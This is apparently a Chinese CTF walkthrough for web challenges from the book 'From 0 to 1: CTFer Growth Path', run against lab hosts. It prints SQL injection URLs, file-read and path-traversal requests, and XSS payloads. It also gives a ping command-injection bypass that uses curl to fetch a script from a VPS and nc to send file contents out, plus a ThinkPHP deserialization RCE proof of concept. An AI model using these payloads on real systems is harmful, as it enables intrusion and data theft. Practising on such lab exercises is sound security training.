目录

一、常见的搜集

二、粗心的小李

三、SQL注入-1

四、SQL注入-2

五、afr_1

六、afr_2

七、afr_3

八、死亡ping命令

九、XSS闯关

十、文件上传

十一、thinkphp反序列化利用链

一、常见的搜集

题目内容:一共3部分flag

使用目录扫描工具,如:7kb-webpathbrute对该URL进行扫描:

打开第一个URL:

发现flag文件flag1_is_her3_fun.txt文件,访问即可得到flag1:n1book{info_1

打开第二个URL:

可以得到flag2:s_v3ry_im

打开第3个URL,下载index.php.swp,打开可以得到第3个flag3:p0rtant_hack}:

组合即可得到完整flag:n1book{info_1s_v3ry_imp0rtant_hack}

二、粗心的小李

题目内容:看看能不能找到信息吧?

1、打开题目提示git信息泄露,直接使用git信息泄露利用工具git_extract下载git泄露的文件:

2、打开下载的index.html文件即可得到flag:n1book{git_looks_s0_easyfun}

三、SQL注入-1

题目内容:SQL注入-1

1、爆字段长度

http://eci-2ze73nro8j9t96ud5uk7.cloudeci1.ichunqiu.com/index.php?id=1' order by 3 --+

2、爆当前库名

http://eci-2ze73nro8j9t96ud5uk7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,database(),3 --+

3、爆表名

http://eci-2ze73nro8j9t96ud5uk7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='note' --+

4、爆列名

http://eci-2ze73nro8j9t96ud5uk7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='fl4g' --+

5、爆值

http://eci-2ze73nro8j9t96ud5uk7.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,group_concat(fllllag),3 from fl4g --+

6、取得flag:n1book{union_select_is_so_cool}

四、SQL注入-2

题目内容:SQL注入-2

1、布尔注入题,直接上SQLMAP吧,注入点是name:

2、上sqlmap,得到flag为n1book{login_sqli_is_nice}:

五、afr_1

题目内容:afr_1

1、afr(Arbitrary file read)考虑是任意文件读取,测试一下有哪些文件,发现有flag,但是没有显示flag:

2、考虑使用PHP封装协议读取PHP文件:

http://eci-2ze73nro8j9t9uiqiiqf.cloudeci1.ichunqiu.com/?p=php://filter/read=convert.base64-encode/resource=flag

3、将返回的值用base64编码解码,得到flag:n1book{afr_1_solved}

六、afr_2

题目内容:afr_2

1、发现IMG目录可以列目录:

2、在img目录后加上../进行目录穿越:

http://eci-2zeiuwocknfo2h9486dd.cloudeci1.ichunqiu.com/img../

3、访问flag文件获取flag:n1book{afr_2_solved}

七、afr_3

题目内容:afr_3

暂未做出

八、死亡ping命令

题目内容:路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串,试试看如何绕过呢?

1、使用burp测试命令执行,发现可以在ip=%0A后执行命令。

2、经测试无法反弹bash到vps。可以使用执行curl命令下载sh脚本到服务器,再执行的方式,将结果nc到vps回显执行的命令。

3、在VPS的web服务器部署1.sh文件,内容如下:

ls / | nc x.x.x.x 8890

4、执行:

%0Acurl x.x.x.x/1.sh > /tmp/1.sh

5、vps上使用nc监听端口:

nc -lvvp 8890

6、执行:

%0Ash /tmp/1.sh

7、可以看到vps上反弹了ls /命令执行的结果:

8、使用同样的方式在VPS上创建2.sh内容为:

cat /FLAG | nc x.x.x.x 8890

9、使用同样的方式重复3-6步下载到靶机中,然后运行获取到flag:n1book{6fa82809179d7f19c67259aa285a7729}

九、XSS闯关

题目内容:你能否过关斩将解决所有XSS问题最终获得flag呢?

1、点击“点我开始”按钮,进行XSS闯关。第一关:随便输入<script>alert(1);</script>即可过关。

http://eci-2ze6hmaj0gtidor7pzph.cloudeci1.ichunqiu.com/level1?username=<script>alert(1);</script>

2、过关后跳到第二关,查看url,level1变成了level2,于是依次修改到level7,就提示通关,获取了flag:n1book{xss_is_so_interesting}

http://eci-2ze6hmaj0gtidor7pzph.cloudeci1.ichunqiu.com/level7?username=

十、文件上传

题目内容:文件上传

暂未做出

十一、thinkphp反序列化利用链

题目内容:对一个框架的反序列化进行利用链挖掘

分析参考:https://blog.csdn.net/zy15667076526/article/details/114975476

poc:

<?php
namespace think;
abstract class Model{protected $append = [];private $data = [];function __construct(){$this->append = ["ethan"=>["calc.exe","calc"]];$this->data = ["ethan"=>new Request()];}
}
class Request
{protected $hook = [];protected $filter = "system";protected $config = [// 表单请求类型伪装变量'var_method'       => '_method',// 表单ajax伪装变量'var_ajax'         => '_ajax',// 表单pjax伪装变量'var_pjax'         => '_pjax',// PATHINFO变量名 用于兼容模式'var_pathinfo'     => 's',// 兼容PATH_INFO获取'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],// 默认全局过滤方法 用逗号分隔多个'default_filter'   => '',// 域名根,如thinkphp.cn'url_domain_root'  => '',// HTTPS代理标识'https_agent_name' => '',// IP代理获取标识'http_agent_ip'    => 'HTTP_X_REAL_IP',// URL伪静态后缀'url_html_suffix'  => 'html',];function __construct(){$this->filter = "system";$this->config = ["var_ajax"=>''];$this->hook = ["visible"=>[$this,"isAjax"]];}
}
namespace think\process\pipes;use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{private $files = [];public function __construct(){$this->files=[new Pivot()];}
}
namespace think\model;use think\Model;class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo urlencode(serialize(new Windows()));//str=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bs%3A5%3A%22ethan%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22calc.exe%22%3Bi%3A1%3Bs%3A4%3A%22calc%22%3B%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A5%3A%22ethan%22%3BO%3A13%3A%22think%5CRequest%22%3A3%3A%7Bs%3A7%3A%22%00%2A%00hook%22%3Ba%3A1%3A%7Bs%3A7%3A%22visible%22%3Ba%3A2%3A%7Bi%3A0%3Br%3A9%3Bi%3A1%3Bs%3A6%3A%22isAjax%22%3B%7D%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3Bs%3A9%3A%22%00%2A%00config%22%3Ba%3A1%3A%7Bs%3A8%3A%22var_ajax%22%3Bs%3A0%3A%22%22%3B%7D%7D%7D%7D%7D%7D
?>

按图执行获取FLAG:n1book{de70641304640057390e8fabc8b515bf}

i春秋《从0到1:CTFer成长之路》通关WP相关推荐

  1. 从0到1:CTFer成长之路

    作者:Nu1L战队 出版社:电子工业出版社 品牌:电子工业出版社 出版时间:2020-10-01 从0到1:CTFer成长之路

  2. 《从0到1:CTFer成长之路》 [第一章 web入门] 常见的搜集

    <从0到1:CTFer成长之路> [第一章 web入门] 常见的搜集 启动环境: 提示为敏感文件,首先对网站目录进行扫描: 得到如上页面,首先访问robots.txt页面: 得到flag1 ...

  3. 《从0到1:CTFer成长之路》书籍配套题目-[第一章 web入门]SQL注入-2

    [第一章 web入门]SQL注入-2 一.信息收集 1.首页 2.登录成功会跳转到 3.进行测试判断 二.尝试破解 1.用post型的sqlmap破解 <1>.首先,开burp截包 < ...

  4. 从0到1:CTFer成长之路docker环境搭建

    1. 安装 docker 使用官方安装脚本安装 sudo curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun 也可以使 ...

  5. CTF学习记录 i春秋 《从0到1:CTFer成长之路》文件上传

    21.10.19 第二次开始学习CTF 感觉很有收获 至少有让自己忙起来了的感觉 感觉有一些学习状态了 打算重新记录一下学习笔记!加油 我会坚持下去的! 题目代码 首先附上题目的代码段(不完整) sh ...

  6. 《从0到1:CTFer成长之路》书籍配套题目--afr_3 BUUCTF

    还是任意文件读取漏洞 进入坏境 点入链接 这边可以读取文件 试一试article?name=../../../etc/passwd 读不到flag /proc详解 linux进程与它的文件描述符./p ...

  7. 《从0到1:CTFer成长之路》SQL注入-2

    前言: 我是新手小白,创建此文章只为了记录自己的学习 题目: 我们先进入环境,老规矩先查看源码 有提示,那就先用提示来做吧,简单快捷易上手了属于是: 手工方法: 1. 随便输入一个账号试试: 输入ad ...

  8. 《从0到1:CTFer成长之路》1.3 任意文件读取漏洞

    文章目录 1.3.1 文件读取漏洞常见触发点 1.3.1.1 web语言 1. PHP 2.python 3.Java 4.Ruby 5.Node 1.3.1.2 中间件.服务件相关 1.Nginx错 ...

  9. 《从0到1:CTFer成长之路》粗心的小李

    前言: 我是CTF小白,创建此文章只为了记录自己学习的进度 题目: 我们先进入环境 这边给了提示,是吧git放到了外网环境,直接扫一下目录吧,查找一下git目录 git目录下是有东西的 所以我们可以利 ...

  10. 《从0到1:CTFer成长之路》常见的搜集

    前言: 我是CTF小白,创建此文章只为了记录自己学习的进度 题目: 我们先进入环境 看到信息搜集,直接用扫目录软件开扫 扫到了这个网页,我们进去查看一下 发现他给我们提示了一个网址,我们进入这个网址 ...

最新文章

  1. 澳洲中本聪Craig Wright涉嫌论文抄袭?
  2. Webpack实现按需打包Lodash的几种方法详解
  3. Java的新项目学成在线笔记-day12(六)
  4. todo:过几天熟悉下Github
  5. macOS安装Maven_IDEA集成Maven
  6. 好玩gan_效果超赞服务器挤爆!用GAN生成人像油画火了,带你一秒回到文艺复兴...
  7. 转进制(信息学奥赛一本通-T1161)
  8. python编写函数判断三角形_使用Python三角函数公式计算三角形的夹角案例
  9. 接口测试--ssl证书问题
  10. leveldb - log格式
  11. ANT安装(亲测可用)
  12. AS2在FLASH中调用EXE文件方法详细说明 已测试可行
  13. 机器人动作编辑器说明
  14. 犹太人很会赚钱?一老板用犹太人的思维做生意,一年赚了200多万!
  15. appcan java_AppCan项目源码
  16. 202203Self-Supervised Pretraining and Controlled Augmentation Improve RareWildlife Recognition inUAV
  17. 当今社会到底更需要专才还是通才
  18. 工作室多拨宽带如何优化?
  19. node 压缩图片_用图压批量压缩图片就这么简单
  20. 老毛桃u盘重装win7教程|老桃毛U盘重装系统图文步骤

热门文章

  1. 「技术选型」Solr与ES难以抉择?且看第一回
  2. UE高级性能剖析技术(三)-- Android内存分布和优化
  3. a55 matlab排列组合_matlab矩阵排列组合
  4. 项目vite1.0升级到2.0打包遇到Some chunks are larger问题如何解决
  5. Bios开启CPU虚拟化后,进不了系统,解决办法如下
  6. 服务器怎么设置自动拨号,网件路由器怎么设置自动拨号
  7. 多自由度有阻尼matlab,有阻尼多自由度系统固有频率、阻尼的求取
  8. Edwin windows下基本命令:
  9. 计算机鼠标不灵活怎么办,鼠标不灵怎么办 鼠标不灵的常见解决方法
  10. Python提取CSV数据统计四分位数